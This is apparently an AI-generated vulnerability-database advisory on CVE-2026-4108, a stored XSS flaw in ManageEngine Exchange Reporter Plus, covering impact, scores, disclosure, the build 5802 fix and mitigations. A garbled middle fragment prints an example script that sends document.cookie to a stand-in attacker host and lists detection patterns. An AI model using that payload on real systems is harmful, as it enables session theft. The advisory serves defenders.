
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4108 is a Stored Cross-Site Scripting (XSS) vulnerability in Zohocorp ManageEngine Exchange Reporter Plus affecting all builds before version 5802 (including builds 5800 and 5801). The flaw resides in the Non-Owner Mailbox Permission report within the Reports module, where user-supplied input is not properly neutralized before being rendered in web pages. It was disclosed on April 3, 2026, and fixed on March 19, 2026 in build 5802. The CVSS v3.1 base score is reported as 4.8 (Medium) by NVD and 7.3 (High) by GitHub Advisory Database, with the vendor classifying severity as High (ManageEngine Advisory, Github Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and stems from insufficient input validation in the Non-Owner Mailbox Permission report feature of Exchange Reporter Plus (ManageEngine Advisory). An authenticated attacker with Exchange administrative privileges can inject malicious JavaScript payloads into report fields; these scripts are persistently stored in the application and execute in the browsers of other users who subsequently view the affected report. Exploitation requires network access, low attack complexity, high privileges, and user interaction (a victim must view the poisoned report page) (Github Advisory).
Successful exploitation allows an authenticated attacker to execute arbitrary scripts in the context of other users' browser sessions when they view the Non-Owner Mailbox Permission report. This can lead to theft of session tokens, exposure of sensitive Exchange reporting data, and unauthorized actions performed on behalf of the victim within Exchange Reporter Plus. Availability is not impacted, but both confidentiality and integrity are at risk — attackers may exfiltrate report data or manipulate report content (ManageEngine Advisory, Github Advisory).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.023% (7th percentile), indicating a low near-term exploitation probability. The vulnerability was responsibly disclosed by researcher C311 through the Zoho BugBounty program and is not listed in the CISA Known Exploited Vulnerabilities catalog (ManageEngine Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into an input field that is stored and later rendered in the report.<script>, javascript:, onerror=, URL-encoded equivalents) submitted to Non-Owner Mailbox Permission report endpoints.Zohocorp resolved this vulnerability in ManageEngine Exchange Reporter Plus build 5802, released March 19, 2026, by implementing proper input validation in the affected report module. All users should upgrade to build 5802 or later immediately using the available service pack (ManageEngine Advisory). As interim mitigations prior to patching: restrict access to the Non-Owner Mailbox Permission report to only trusted administrators, implement Content Security Policy (CSP) headers on the application, and monitor authentication logs for anomalous session activity.
The vulnerability was reported by security researcher C311 via the Zoho BugBounty program and received standard coverage across vulnerability aggregation platforms including VulDB, CIRCL, and ENISA EUVD shortly after disclosure (ManageEngine Advisory). A brief mention appeared on Bluesky social media (cyberhub.blog) on April 3, 2026. No significant independent researcher commentary or major media coverage has been identified beyond routine vulnerability database entries.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."